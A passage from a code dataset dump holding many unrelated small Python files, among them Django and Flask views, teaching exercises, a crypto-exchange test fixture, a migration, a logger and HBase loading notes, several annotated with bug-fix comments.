            return {'message': "Area with name '{}' deleted".format(name)}, 204
        return {'message': 'Wrong area name provided'}, 404
class AreaList(Resource):
    """List endpoint: return every stored area (JWT protected)."""
    @jwt_required()
    def get(self):
        # Bug fix: the original line indexed the builtin `list` with a map of
        # lambdas over the undefined name `StoreMode` -- it could never run.
        # Return a JSON-serializable list of this module's areas instead.
        return [area.json() for area in AreaModel.query.all()]
9,549 | 6bd9c8e38373e696193c146b88ebf6601170cf0e | from django.urls import reverse_lazy
from django.views.generic import CreateView, edit, ListView
from django.shortcuts import render
from django.contrib.auth import authenticate, login
from users.forms import CustomUserCreationForm, LoginForm
from users.models import CustomUser as Users
class SignUpView(CreateView):
    # Standard signup form; on success the new user is sent to the login page.
    form_class = CustomUserCreationForm
    success_url = reverse_lazy('login')
    template_name = 'users/signup.html'
class IndexView(edit.FormView):
    """Login page: authenticates the submitted credentials and, on success,
    logs the user in and redirects to /facilities."""
    success_url = '/facilities'
    form_class = LoginForm
    template_name = 'users/index.html'

    def form_valid(self, form):
        username = form.cleaned_data['username']
        password = form.cleaned_data['password']
        user = authenticate(self.request, username=username, password=password)
        if user is None:
            # Bug fix: the original fell through to the success redirect even
            # when authentication failed (nobody logged in, yet the client
            # was sent to success_url). Re-render the form with an error.
            form.add_error(None, 'Invalid username or password')
            return self.form_invalid(form)
        login(self.request, user)
        return super().form_valid(form)
|
9,550 | a3f6ea649fc5e60b0f8353b1404912d060686b99 | # 10.13.20 - sjg
# Exercise 15 - solution A
# Write a function called greatestCommomFactor that,
#given two distinct positive integers,
#returns the greatest common factor of those two values
#Input: greatestCommonFactor(9,12)
#Output: 3
#Input: greatestCommonFactor(6,18)
#Output: 6
#Input: greatestCommonFactor(11,4)
#Output: 1
def greatestCommonFactor(posInt1, posInt2):
    """Return the greatest common factor of two positive integers.

    Uses the Euclidean algorithm -- O(log min(a, b)) -- instead of the
    original approach of enumerating every factor of both numbers
    (O(posInt1 + posInt2) work and two throwaway lists). For positive
    integers the result is identical.
    """
    a, b = posInt1, posInt2
    while b:
        a, b = b, a % b
    # Preserved from the original implementation: announce the result
    # before returning it.
    print("The greatest common factor of", posInt1, "and", posInt2, "is:")
    return a
# Demo runs matching the examples in the header comment (expected: 3, 6, 1).
print(greatestCommonFactor(9,12))
print(greatestCommonFactor(6,18))
print(greatestCommonFactor(11,4))
9,551 | 00e8e0b5aeccd2a67f6cfdad63012a0d8b066e6f | from django.shortcuts import render
from django.template import loader
# Create your views here.
from django.http import HttpResponse
from .models import Student
def index(request):
    """Render the list of all students."""
    context = {"students": Student.objects.all()}
    return render(request, 'student_list.html', context)
def addstudent(request):
    """Render the empty 'add student' form page."""
    return render(request, 'add_student.html', {})
def newstudent(request):
    """Create a Student from the submitted name, then show the updated list.

    Fixes: the original rendered student_list.html with an empty context
    (so the freshly created student -- and everyone else -- never appeared)
    and left a debug print() behind.
    NOTE(review): creation happens on a GET parameter; a POST would be more
    appropriate since GETs should be side-effect free -- confirm against the
    form template before changing the method.
    """
    student_entered_name = request.GET.get('name')
    Student.objects.create(name=student_entered_name)
    context = {"students": Student.objects.all()}
    return render(request, 'student_list.html', context)
|
9,552 | 0bf970a84911d29a8343575ef15f2765875b8b89 | from graphics import *
from random import random
def printIntro():
    """Print the program banner."""
    print("This program evaluates pi via Monte Carlo techniques")
def simDarts(n):
    """Throw n random darts at the [-1, 1] square and return how many land
    inside the unit circle. Opens a graphics window (kept from the original;
    note the darts are never actually drawn into it).
    """
    win = GraphWin("", 400, 400)
    win.setCoords(-1.2, -1.2, 1.2, 1.2)
    hits = 0
    for _ in range(n):
        # Cleanup: the original had a redundant `else: hits = hits` branch.
        if hitTarget(getDarts()):
            hits = hits + 1
    return hits
def getDarts():
    """Return a random Point uniformly distributed over [-1, 1] x [-1, 1]."""
    x = 2 * random() - 1
    y = 2 * random() - 1
    return Point(x, y)
def hitTarget(pt):
    """True when `pt` lies inside or on the unit circle at the origin."""
    return pt.getX() ** 2 + pt.getY() ** 2 <= 1
def getPi(hits, n):
    """Estimate pi as 4 * (fraction of darts that landed in the circle)."""
    return 4 * (hits / n)
def main():
    """Prompt for a simulation size, run it, and print the pi estimate."""
    printIntro()
    # Security fix: the original used eval(input(...)), which executes
    # arbitrary user input. The prompt expects an integer, so parse with
    # int() (raises ValueError on bad input instead of executing it).
    n = int(input("Please enter the number of simulation (n > 500): "))
    h = simDarts(n)
    pi = getPi(h, n)
    print("Pi = ", pi)
# Script entry point: run the simulation immediately on import/execution.
main()
|
9,553 | 42f021c728a88f34d09f94ea96d91abded8a29fb | # Generated by Django 3.2.6 on 2021-08-19 16:17
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('crm', '0040_auto_20210819_1913'),
]
operations = [
migrations.RemoveField(
model_name='customer',
name='full_name',
),
migrations.RemoveField(
model_name='managercrm',
name='full_name',
),
]
|
9,554 | 5718eab8c5fac4cb7bfa1b049b63ca1e30610247 | L = [
[
"0",
"0",
"00"
],[
"..0",
"000"
],[
"00",
".0",
".0"
], [
"000",
"0"
]
]
J = [
[
".0",
".0",
"00"
],[
"0..",
"000"
],[
"00",
"0",
"0"
], [
"000",
"..0"
]
]
O = [
[
"00",
"00"
]
]
T = [
[
"000",
".0"
], [
"0",
"00",
"0"
], [
".0",
"000"
], [
".0",
"00",
".0"
]
]
I = [
[
"0000"
], [
"0",
"0",
"0",
"0"
]
]
S = [
[
".00",
"00"
], [
"0.",
"00",
".0"
]
]
Z = [
[
"00",
".00"
], [
".0",
"00",
"0"
]
]
shapes = [L, J, O, T, I, S, Z]
shapes_colors = [
(255, 230, 0),
(38, 255, 0),
(0, 213, 255),
(255, 0, 255),
(255, 0, 0),
(255, 170, 0),
(157, 0, 255)
]
|
9,555 | eba8e2bda786760898c10d3e75620144973d6236 | class FixtureBittrex:
PING = {"serverTime": 1582535502000}
MARKETS = [
{
"symbol": "ETH-BTC", "baseCurrencySymbol": "ETH", "quoteCurrencySymbol": "BTC",
"minTradeSize": "0.01314872", "precision": 8,
"status": "ONLINE", "createdAt": "2015-08-14T09:02:24.817Z"},
{
"symbol": "BTC-USDT", "baseCurrencySymbol": "BTC", "quoteCurrencySymbol": "USDT",
"minTradeSize": "0.00025334", "precision": 8,
"status": "ONLINE", "createdAt": "2015-12-11T06:31:40.633Z", "notice": ""},
{
"symbol": "BTC-USD", "baseCurrencySymbol": "BTC", "quoteCurrencySymbol": "USD",
"minTradeSize": "0.00025427", "precision": 3,
"status": "ONLINE", "createdAt": "2018-05-31T13:24:40.77Z"},
{
"symbol": "ETH-USDT", "baseCurrencySymbol": "ETH", "quoteCurrencySymbol": "USDT",
"minTradeSize": "0.01334966", "precision": 8,
"status": "ONLINE", "createdAt": "2017-04-20T17:26:37.647Z", "notice": ""}
]
MARKETS_TICKERS = [
{
"symbol": "ETH-BTC", "lastTradeRate": "0.02739396",
"bidRate": "0.02740726", "askRate": "0.02741416"},
{
"symbol": "ETH-USDT", "lastTradeRate": "267.26100000",
"bidRate": "266.96646649", "askRate": "267.22586512"},
{
"symbol": "BTC-USDT", "lastTradeRate": "9758.81200003",
"bidRate": "9760.51000000", "askRate": "9765.82533436"},
{
"symbol": "BTC-USD", "lastTradeRate": "9770.73200000",
"bidRate": "9767.64400000", "askRate": "9770.73200000"}
]
# General User Info
BALANCES = [{"currencySymbol": "BTC", "total": "0.00279886", "available": "0.00279886"},
{"currencySymbol": "BTXCRD", "total": "1031.33915356", "available": "1031.33915356"},
{"currencySymbol": "ETH", "total": "0.24010276", "available": "0.24010276"},
{"currencySymbol": "USDT", "total": "76.30113330", "available": "67.48856276"},
{"currencySymbol": "XZC", "total": "4.99205590", "available": "4.99205590"},
{"currencySymbol": "ZRX", "total": "0.00000000", "available": "0.00000000"}]
# User Trade Info
FILLED_BUY_LIMIT_ORDER = {
"id": "d7850281-0440-4478-879f-248499b2134d", "marketSymbol": "ETH-USDT", "direction": "BUY",
"type": "LIMIT", "quantity": "0.06000000", "limit": "268.09208274",
"timeInForce": "GOOD_TIL_CANCELLED", "fillQuantity": "0.06000000", "commission": "0.01333791",
"proceeds": "5.33516582", "status": "CLOSED", "createdAt": "2020-02-24T09:38:13.1Z",
"updatedAt": "2020-02-24T09:38:13.1Z", "closedAt": "2020-02-24T09:38:13.1Z"}
OPEN_BUY_LIMIT_ORDER = {
"id": "615aa7de-3ff9-486d-98d7-2d37aca212c9", "marketSymbol": "ETH-USDT", "direction": "BUY",
"type": "LIMIT", "quantity": "0.06000000", "limit": "205.64319999",
"timeInForce": "GOOD_TIL_CANCELLED", "fillQuantity": "0.00000000", "commission": "0.00000000",
"proceeds": "0.00000000", "status": "OPEN", "createdAt": "2020-02-25T11:13:32.12Z",
"updatedAt": "2020-02-25T11:13:32.12Z"}
CANCEL_ORDER = {
"id": "615aa7de-3ff9-486d-98d7-2d37aca212c9", "marketSymbol": "ETH-USDT", "direction": "BUY",
"type": "LIMIT", "quantity": "0.06000000", "limit": "205.64319999",
"timeInForce": "GOOD_TIL_CANCELLED", "fillQuantity": "0.00000000", "commission": "0.00000000",
"proceeds": "0.00000000", "status": "CLOSED", "createdAt": "2020-02-25T11:13:32.12Z",
"updatedAt": "2020-02-25T11:13:33.63Z", "closedAt": "2020-02-25T11:13:33.63Z"}
ORDERS_OPEN = [
{
"id": "9854dc2a-0762-408d-922f-882f4359c517", "marketSymbol": "ETH-USDT", "direction": "BUY", "type": "LIMIT",
"quantity": "0.03000000", "limit": "134.75247524", "timeInForce": "GOOD_TIL_CANCELLED",
"fillQuantity": "0.00000000", "commission": "0.00000000", "proceeds": "0.00000000", "status": "OPEN",
"createdAt": "2020-01-10T10:25:25.13Z", "updatedAt": "2020-01-10T10:25:25.13Z"},
{
"id": "261d9158-c9c1-40a6-bad8-4b447a471d8f", "marketSymbol": "ETH-USDT", "direction": "BUY", "type": "LIMIT",
"quantity": "0.03000000", "limit": "158.26732673", "timeInForce": "GOOD_TIL_CANCELLED",
"fillQuantity": "0.00000000", "commission": "0.00000000", "proceeds": "0.00000000", "status": "OPEN",
"createdAt": "2020-01-26T02:58:14.19Z", "updatedAt": "2020-01-26T02:58:14.19Z"}
]
WS_AFTER_BUY_2 = {
'event_type': 'uO', 'content': {
'w': 'f8907116-4e24-4602-b691-d110b5ce1bf8', 'N': 8, 'TY': 2,
'o': {
'U': '00000000-0000-0000-0000-000000000000',
'I': 4551095126,
'OU': 'd67c837e-56c5-41e2-b65b-fe590eb06eaf',
'E': 'ETH-USDT', 'OT': 'LIMIT_BUY', 'Q': 0.06, 'q': 0.0,
'X': 269.05759499, 'n': 0.01338594, 'P': 5.35437999,
'PU': 267.7189995, 'Y': 1582540341630,
'C': 1582540341630, 'i': False, 'CI': False, 'K': False,
'k': False, 'J': None, 'j': None, 'u': 1582540341630,
'PassthroughUuid': None}},
'error': None,
'time': '2020-02-24T10:32:21'
}
WS_AFTER_BUY_1 = {
'event_type': 'uO', 'content': {
'w': 'f8907116-4e24-4602-b691-d110b5ce1bf8', 'N': 13, 'TY': 0,
'o': {
'U': '00000000-0000-0000-0000-000000000000', 'I': 4564385840,
'OU': '615aa7de-3ff9-486d-98d7-2d37aca212c9', 'E': 'ETH-USDT',
'OT': 'LIMIT_BUY', 'Q': 0.06, 'q': 0.06, 'X': 205.64319999, 'n': 0.0,
'P': 0.0, 'PU': 0.0, 'Y': 1582629212120, 'C': None, 'i': True,
'CI': False, 'K': False, 'k': False, 'J': None, 'j': None,
'u': 1582629212120, 'PassthroughUuid': None}},
'error': None,
'time': '2020-02-25T11:13:32'
}
WS_AFTER_SELL_2 = {
'event_type': 'uO',
'content': {
'w': 'f8907116-4e24-4602-b691-d110b5ce1bf8', 'N': 10, 'TY': 2,
'o': {
'U': '00000000-0000-0000-0000-000000000000', 'I': 4279414326,
'OU': '447256cc-9335-41f3-bec9-7392804d30cd', 'E': 'ETH-USDT',
'OT': 'LIMIT_SELL', 'Q': 0.06, 'q': 0.0, 'X': 257.72689, 'n': 0.0129511,
'P': 5.18044, 'PU': 259.022, 'Y': 1582627522640, 'C': 1582627522640,
'i': False, 'CI': False, 'K': False, 'k': False, 'J': None, 'j': None,
'u': 1582627522640, 'PassthroughUuid': None}},
'error': None,
'time': '2020-02-25T10:45:22'}
WS_ORDER_BOOK_SNAPSHOT = {
'nonce': 115097,
'type': 'snapshot',
'results': {
'M': 'ETH-USDT', 'N': 115097,
'Z': [
{'Q': 3.7876, 'R': 261.805},
{'Q': 3.99999998, 'R': 261.80200001},
{'Q': 20.92267278, 'R': 261.75575521}],
'S': [
{'Q': 3.618, 'R': 262.06976758},
{'Q': 1.2, 'R': 262.06976759},
{'Q': 4.0241, 'R': 262.07}],
'f': [
{'I': 53304378, 'T': 1582604545290, 'Q': 1.75736397, 'P': 261.83, 't': 460.1306082651,
'F': 'FILL', 'OT': 'SELL', 'U': 'a0de16e3-6f6d-43f0-b9ea-a8c1f9835223'},
{'I': 53304377, 'T': 1582604544910, 'Q': 0.42976603, 'P': 261.83, 't': 112.5256396349,
'F': 'FILL', 'OT': 'SELL', 'U': 'dc723d5e-2af5-4010-9eb2-a915f050015e'}]}
}
|
9,556 | 67b483d9d002cc66dd368cf53fdc49ebb7b4f4d4 | # type: ignore[no-redef]
import pytest
@pytest.mark.asyncio
@pytest.mark.core
async def test_async_executor(executor):
    """Exercise executor.run: no-return, plain return, positional-only /
    keyword arguments, and **kwargs forwarding.

    Cleanup: each case now gets a distinctly named function instead of
    redefining `func` four times (the reason the file needed a blanket
    `# type: ignore[no-redef]`).
    """
    def returns_none():
        pass

    assert await executor.run(returns_none) is None

    def returns_one():
        return 1

    assert await executor.run(returns_one) == 1

    def divide(x: int, /, y: float):
        return x / y

    assert await executor.run(divide, 0, 1) == 0
    assert await executor.run(divide, 0, y=1) == 0

    def add_with_kwargs(x: int, y: float, **kwargs):
        return x + y + kwargs.get("test")

    assert await executor.run(add_with_kwargs, 0, y=1, test=2) == 3
|
9,557 | 62094d036596f39e7cf936fe7a91e67d53ee055e | from flask import (
Flask,
render_template,
request
)
import requests
# Shared Flask app and the GitHub REST API root used by the lookup view.
app = Flask(__name__)
base_url = "https://api.github.com/users/"
@app.route("/", methods = ["GET", "POST"])
def index():
if request.method == "POST":
githubName = request.form.get("githubname")
responseUser = requests.get("{}{}".format(base_url, githubName))
responseRepos = requests.get("{}{}/repos".format(base_url, githubName))
userInfo = responseUser.json()
userRepos = responseRepos.json()
if "message" in userInfo:
return render_template("index.html", error = "Kullanıcı Bulunamadı")
return render_template("index.html", profile = userInfo , repos = userRepos)
return render_template("index.html")
if __name__ == "__main__":
app.run(debug = True) |
9,558 | ce65a672cae26bdb8ec8cb04eabfe1877f9cd7d4 | #!/usr/bin/env python
# coding: utf-8
from sklearn.metrics import confusion_matrix
import numpy as np
import pandas as pd

# Load pairwise results (expects columns: col1, col2, result) and pivot them
# into a col1-by-col2 matrix; pairs with no observation become 0.
df = pd.read_csv('orb.csv')
d = pd.pivot_table(df,index='col1',columns='col2',values='result')
d.fillna(0,inplace=True)
|
9,559 | 8fa58791aae1352109b3bf7410d68bf5ae1d8cb7 | # coding: utf-8
"""
Styled object
=============
A :class:`~benker.styled.Styled` object contains a dictionary of styles.
It is mainly used for :class:`~benker.table.Table`, :class:`~benker.table.RowView`,
:class:`~benker.table.ColView`, and :class:`~benker.cell.Cell`.
"""
import pprint
class Styled(object):
    """
    Base class for styled table objects (Table, Row, Column, and Cell views).

    A *Styled* object keeps two pieces of state:

    *   a dictionary of user-defined styles — key/value pairs, typically
        HTML-like styles (border-style, border-width, text-align, ...),
        though any set of style names can be used;
    *   a *nature* — used to distinguish body cells from header and footer
        cells ("body", "header", "footer", or whatever suits your needs),
        or, for tables, a value similar to an HTML ``@class`` attribute.

    .. note::

        The style dictionary is always copied on assignment: the key-value
        pairs are copied, but only shallowly (values are shared), which is
        fine for non-mutable values like :class:`str`.
    """
    __slots__ = ('_styles', 'nature')

    def __init__(self, styles, nature):
        """
        Construct a styled object from a dictionary of styles.

        :type styles: typing.Dict[str, str]
        :param styles:
            Mapping of style names to values (may be ``None``).

        :type nature: str
        :param nature:
            Nature of the object ("body", "header", "footer", ...) or a
            table tag; may be ``None``.
        """
        # Assignment goes through the *styles* property below, which copies.
        self.styles = styles
        #: Cell *nature*, or table tag similar to HTML ``@class``.
        self.nature = nature

    def __str__(self):
        return str(self._styles)

    def __repr__(self):
        return "<{cls}({items}, {nature!r})>".format(
            cls=type(self).__name__,
            items=pprint.pformat(self._styles),
            nature=self.nature,
        )

    @property
    def styles(self):
        """ Dictionary of styles: key-value pairs. """
        return self._styles

    @styles.setter
    def styles(self, styles):
        """ Replace the styles; a shallow copy of the mapping is stored. """
        # Each object owns its own copy of the styles.
        self._styles = dict(styles) if styles is not None else {}
|
9,560 | 53909b750f259b67b061ba26d604e0c2556376df | ###############################################################################
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
__author__ = 'Donovan Parks'
__copyright__ = 'Copyright 2020'
__credits__ = ['Donovan Parks']
__license__ = 'GPL3'
__version__ = '0.0.1'
__maintainer__ = 'Donovan Parks'
__email__ = 'donovan.parks@gmail.com'
__status__ = 'Development'
import sys
import argparse
import re
import datetime
import os
import logging
import time
import math
from collections import defaultdict, namedtuple
from biolib.common import canonical_gid
class CurationLists(object):
    """Lists and pseudo-trees for new representatives, polyphyletic taxa, rogue genomes, and genomes with modified NCBI names."""

    def __init__(self, domain, output_dir):
        """Initialization.

        :param domain: Domain label used in output file names.
        :param output_dir: Directory to which lists and pseudo-trees are written.
        """
        self.domain = domain
        self.output_dir = output_dir
        self.logger = logging.getLogger('timestamp')

    def pseudo_tree(self, gids, out_tree):
        """Create pseudo-tree (a single star clade) with the specified genome IDs."""
        # Context manager ensures the handle is closed even on error
        # (the original used open/write/close and could leak on exceptions).
        with open(out_tree, 'w') as fout:
            fout.write('(' + ','.join(gids) + ');')

    def _write_gid_list(self, gids, out_file):
        """Write one genome ID per line to *out_file* plus a matching pseudo-tree."""
        with open(out_file, 'w') as fout:
            for gid in gids:
                fout.write('{}\n'.format(gid))
        self.pseudo_tree(gids, out_file.replace('.lst', '.tree'))

    def _read_rep_ids(self, sp_cluster_file):
        """Read canonical representative IDs (first column) from a species-cluster TSV; header skipped."""
        rids = set()
        with open(sp_cluster_file) as f:
            f.readline()  # skip header
            for line in f:
                tokens = line.strip().split('\t')
                rids.add(canonical_gid(tokens[0]))
        return rids

    def new_gtdb_reps(self,
                      domain_gids,
                      gtdb_sp_clusters,
                      gtdb_prev_sp_clusters):
        """New GTDB representatives."""
        self.logger.info('Identifying previous GTDB representatives.')
        prev_rids = self._read_rep_ids(gtdb_prev_sp_clusters)
        self.logger.info(' - identified {:,} previous GTDB representatives.'.format(
            len(prev_rids)))

        self.logger.info('Identifying current GTDB representatives.')
        cur_rids = self._read_rep_ids(gtdb_sp_clusters)
        self.logger.info(' - identified {:,} current GTDB representatives.'.format(
            len(cur_rids)))

        self.logger.info('Creating curation list and pseudo-tree of new GTDB representatives.')
        out_file = os.path.join(self.output_dir, f'gids_new_reps.{self.domain}.lst')
        # A representative is "new" if it belongs to this domain and was not
        # a representative in the previous release.
        new_rids = {rid for rid in cur_rids
                    if rid in domain_gids and rid not in prev_rids}
        self._write_gid_list(new_rids, out_file)
        self.logger.info(' - identified {:,} new GTDB representatives.'.format(
            len(new_rids)))

    def poly_rogue_gtdb_reps(self,
                             domain_gids,
                             taxa_gid_map,
                             gtdb_decorate_table):
        """Polyphyletic and rogue GTDB representatives."""
        self.logger.info('Identifying polyphyletic and rogue GTDB representatives.')
        poly_taxa_count = 0
        poly_gids = set()
        rogue_gids = set()
        with open(gtdb_decorate_table) as f:
            f.readline()  # skip header
            for line in f:
                tokens = line.split('\t')
                taxon = tokens[0]
                fmeasure = float(tokens[2])
                # An F-measure below 1.0 indicates the taxon is not
                # monophyletic in the decorated tree.
                if fmeasure < 1.0:
                    poly_taxa_count += 1
                    poly_gids.update(taxa_gid_map[taxon])

                # Rogue genomes appear in two columns: those placed into the
                # taxon and those placed out of it; both are handled the same.
                for rogue_field in (tokens[7].strip(), tokens[8].strip()):
                    if rogue_field:
                        for gid in rogue_field.split(','):
                            gid = canonical_gid(gid.strip())
                            if not gid.startswith('D-'):  # skip dummy IDs
                                rogue_gids.add(gid)

        self.logger.info(' - identified {:,} polyphyletic taxa spanning {:,} GTDB representatives.'.format(
            poly_taxa_count,
            len(poly_gids)))
        self.logger.info(' - identified {:,} rogue GTDB representatives.'.format(
            len(rogue_gids)))

        self.logger.info('Creating curation lists and pseudo-trees of polyphyletic GTDB representatives.')
        self._write_gid_list(poly_gids, os.path.join(self.output_dir, f'gids_poly_taxa.{self.domain}.lst'))

        self.logger.info('Creating curation lists and pseudo-trees of rogue GTDB representatives.')
        self._write_gid_list(rogue_gids, os.path.join(self.output_dir, f'gids_rogues.{self.domain}.lst'))

    def run(self,
            gtdb_init_taxonomy,
            gtdb_sp_clusters,
            gtdb_prev_sp_clusters,
            gtdb_decorate_table):
        """Create curation lists and pseudo-trees."""
        # Map each taxon to its genome IDs and collect every genome in the
        # domain (the original left this file handle unclosed).
        self.logger.info('Identifying taxonomic assignment of genomes.')
        taxa_gid_map = defaultdict(set)
        domain_gids = set()
        with open(gtdb_init_taxonomy) as f:
            for line in f:
                tokens = line.strip().split('\t')
                gid = canonical_gid(tokens[0])
                for taxon in [t.strip() for t in tokens[1].split(';')]:
                    taxa_gid_map[taxon].add(gid)
                domain_gids.add(gid)
        self.logger.info(' - identified {:,} genomes.'.format(
            len(domain_gids)))

        # new GTDB representatives
        self.new_gtdb_reps(domain_gids,
                           gtdb_sp_clusters,
                           gtdb_prev_sp_clusters)

        # polyphyletic and rogue GTDB representatives
        self.poly_rogue_gtdb_reps(domain_gids,
                                  taxa_gid_map,
                                  gtdb_decorate_table)
9,561 | fd2b60de2ef540264855f04e1c5bcb9d1cf23c51 | """Changed Views table name
Revision ID: 7f559bb24ca4
Revises: cc927fe47c8f
Create Date: 2021-08-20 23:20:31.959984
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "7f559bb24ca4"
down_revision = "cc927fe47c8f"
branch_labels = None
depends_on = None


def upgrade():
    """Create the renamed ``views`` table and drop the old ``view`` table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table(
        "views",
        sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
        sa.Column("url_id", sa.String(length=31), nullable=True),
        sa.ForeignKeyConstraint(
            ["url_id"],
            ["urls.id"],
        ),
        sa.PrimaryKeyConstraint("id"),
    )
    # NOTE(review): rows are not copied from ``view`` before it is dropped,
    # so existing data is discarded — confirm this is intended.
    op.drop_table("view")
    # ### end Alembic commands ###
def downgrade():
    """Revert the rename: recreate the old ``view`` table and drop ``views``."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table(
        "view",
        sa.Column("id", sa.INTEGER(), nullable=False),
        sa.Column("url_id", sa.VARCHAR(length=31), nullable=True),
        sa.ForeignKeyConstraint(
            ["url_id"],
            ["urls.id"],
        ),
        sa.PrimaryKeyConstraint("id"),
    )
    op.drop_table("views")
    # ### end Alembic commands ###
|
9,562 | cac49a9a2cb753bb81c45ac1d2d887b1f48dd9bb | from Tkinter import *
import time
def create_window():
    """Open a borderless fullscreen splash window that closes itself after 3 s."""
    window = Toplevel(root)
    w, h = root.winfo_screenwidth(), root.winfo_screenheight()
    canvas = Canvas(window,width=w,height=h)
    canvas.create_text(w/2,h/2,text="this will close after 3 seconds",font="Arial")
    canvas.pack()
    # Remove window decorations (title bar, borders) and cover the full screen.
    window.overrideredirect(1)
    window.geometry("%dx%d+0+0" % (w, h))
    # Schedule automatic destruction after 3000 ms.
    window.after(3000, lambda: window.destroy())


# Small launcher window with a single button that triggers the splash.
root = Tk()
root.title("3 Second Splash")
root.geometry("250x250")
b = Button(root, text="Launch splash window", command=create_window)
b.place(relx=0.5,rely=0.5,anchor=CENTER)
#b.pack()
root.mainloop()
|
9,563 | 91188b55b0f5d8277812d82711f5bcde82819b30 | import datetime, time, threading, os
from . import queues
# Supported log levels, ordered from least to most verbose.
logLevels = ["none", "info", "debug"]
# Current log level; writeFile() only writes when this level permits it.
level = "none"


def write(message):
    """Queue *message* for the logger loop (runLogger) to persist."""
    queues.logger_queue.put(message)
def runLogger():
    """Consume messages from the logger queue and append them to a dated log file.

    Runs until the sentinel message "turn off" (queued by writeEnd) arrives.
    """
    # TODO: the log path should be read from config. Pass into logger?
    log_path = "/home/pi/Desktop/Projects/rose/robot_code/logs/"
    # Create the log directory once, up front; the original re-attempted
    # os.makedirs on every loop pass.
    os.makedirs(log_path, exist_ok=True)
    while True:
        # Block until a message arrives instead of spinning on empty() —
        # the original polled in a tight loop and burned CPU.
        # NOTE(review): assumes logger_queue.get() blocks like queue.Queue;
        # confirm the queue type used in the queues module.
        message = queues.logger_queue.get()
        if message == "turn off":
            break
        # Recompute the file name per message so logs roll over at midnight.
        file_name = log_path + "Logs-" + str(datetime.date.today())
        writeFile(file_name, message)
def writeFile(file_name=None, message=None, lvl="none"):
    """Append *message* plus a newline to ``<file_name>.txt`` if the current
    log level is at least *lvl*.

    Unknown level names are treated as the lowest level ("none").
    Nothing is written when either *file_name* or *message* is missing.
    """
    current_index = logLevels.index(level)
    requested_index = logLevels.index(lvl) if lvl in logLevels else 0
    if current_index < requested_index:
        return
    if file_name is None or message is None:
        return
    with open(file_name + ".txt", "a") as handle:
        handle.write(message)
        handle.write("\n")
def writeEnd():
    """Ask the logger loop to shut down by queueing the sentinel message."""
    queues.logger_queue.put("turn off")
|
9,564 | 0e0e51904f05b41b4769b730c836568b8bb63869 | #Sorting for a number list
# Sorting demos: a number list in descending, then ascending, order.
ls = [1, 34, 23, 56, 34, 67, 87, 54, 62, 31, 66]
ls = sorted(ls, reverse=True)
print(ls)
ls = sorted(ls)
print(ls)

# Sorting a list of strings under several different keys.
ls_l = ["aaa", "ertdf", "ieurtff", "fnjr", "resdjx", "jfh", "r", "fd"]
# 1 - by string length, shortest to longest ...
ls_l = sorted(ls_l, key=len)
print(ls_l)
# ... and longest to shortest.
ls_l = sorted(ls_l, key=len, reverse=True)
print(ls_l)


# 2 - by the first character of each string.
def FirstLetter(string):
    """Sort key: the first character of *string*."""
    return string[0]


ls_l = sorted(ls_l, key=FirstLetter)
print(ls_l)

# Sorting nested lists by the element at index 2 of each inner list.
ls2 = [[0, 1, 'f'], [4, 2, 't'], [9, 4, 'afsd']]


def secondItem(ls):
    """Sort key: the element at index 2 of the inner list."""
    return ls[2]


ls2 = sorted(ls2, key=secondItem)
print(ls2)
|
9,565 | 7b38c64174656d1c4ec2b0541e6ed8d6680af7d7 | '''
we have source files with a certain format and each file has 200 columns and there is a process that takes the source
files and loads into hbase and moves it into sql data warehouse. We have to create automated test scripts that compares
with with is with hbase and sql data warehouse. load into hbase and query the flat file, query the hbase, and compare.
compare each row. load into hbase and query.
https://community.hortonworks.com/articles/4942/import-csv-data-into-hbase-using-importtsv.html
https://www.briandunning.com/sample-data/
http://python-phoenixdb.readthedocs.io/en/latest/
https://phoenix.apache.org/faq.html
https://phoenix.apache.org/bulk_dataload.html
hbase shell
create 'CUSTOMERS', 'cf'
count 'CUSTOMERS'
scan 'CUSTOMERS'
exit
hdfs dfs -put customers-with-out-header-500.csv
hbase org.apache.hadoop.hbase.mapreduce.ImportTsv '-Dimporttsv.separator=|' -Dimporttsv.columns="HBASE_ROW_KEY,cf:first_name,cf:last_name,cf:company_name,cf:address,cf:city,cf:county,cf:state,cf:zip,cf:phone1,cf:phone2,cf:email,cf:web" CUSTOMERS customers-with-out-header-500.csv
sudo python3 -m pip install happybase
sudo python3 -m pip install pandas
sudo python3 -m pip install numpy
sudo python3 -m pip install ipython
list of hbase tables [b'customers']
len of hbase keys 501
hbase columns [b'cf:state', b'cf:phone2', b'cf:email', b'cf:zip', b'cf:last_name', b'cf:address', b'cf:city', b'cf:company_name', b'cf:phone1', b'cf:county', b'cf:first_name', b'cf:web']
hbase columns len 12
csv file shape (500, 13)
csv columns ['index', 'first_name', 'last_name', 'company_name', 'address', 'city', 'county', 'state', 'zip', 'phone1', 'phone2', 'email', 'web']
phoenix steps
python /usr/lib/phoenix/bin/sqlline.py
CREATE TABLE "CUSTOMERSPHOENIX" (pk VARCHAR PRIMARY KEY, first_name VARCHAR, last_name VARCHAR, company_name VARCHAR, address VARCHAR, city VARCHAR, county VARCHAR, state VARCHAR, zip VARCHAR, phone1 VARCHAR, phone2 VARCHAR, email VARCHAR, web VARCHAR)
python /usr/lib/phoenix/bin/psql.py -t CUSTOMERSPHOENIX -d "|" localhost customers-with-out-header-500.csv
SELECT A.*, B.* FROM CUSTOMERS AS A FULL JOIN CUSTOMERSPHOENIX AS B ON (A.PK = B.PK) WHERE A.PK IS NULL OR B.PK IS NULL
hive steps
CREATE EXTERNAL TABLE customers_hive(key string, first_name string, last_name string, company_name string, address string, city string, county string, state string, zip string, phone1 string, phone2 string, email string, web string)
STORED BY 'org.apache.hadoop.hive.hbase.HBaseStorageHandler'
WITH SERDEPROPERTIES ("hbase.columns.mapping" = ":key, cf:first_name, cf:last_name, cf:company_name, cf:address, cf:city, cf:county, cf:state, cf:zip, cf:phone1, cf:phone2, cf:email, cf:web")
